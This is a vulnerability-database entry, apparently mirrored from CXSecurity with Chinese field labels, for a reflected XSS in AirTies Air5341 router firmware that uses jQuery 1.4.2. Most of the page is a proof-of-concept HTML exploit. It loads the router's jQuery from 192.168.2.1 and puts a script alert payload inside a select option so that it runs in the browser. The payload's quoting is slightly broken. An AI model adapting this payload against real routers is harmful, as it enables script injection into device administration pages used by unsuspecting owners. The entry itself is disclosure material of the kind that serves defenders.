AirTies Air5341 XSS Reflected JQuery - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1677720 漏洞类型
发布时间 2019-07-25 更新时间 2019-07-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070119
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: AirTies Air5341 XSS Reflected JQuery 1.4.2
# Date: 10-09-2017
# Exploit Author: God3err
# Version: AirTies Air5341 Firmware 1.0.0.12
# Tested on: Komutan Linux - Debian

Exploits :
----------------------------

<html>
<head>
  <meta charset="utf-8">
  <title>God3err XSS Protect </title>
  <script src="http://192.168.2.1/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert('God3err Xss Founded;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>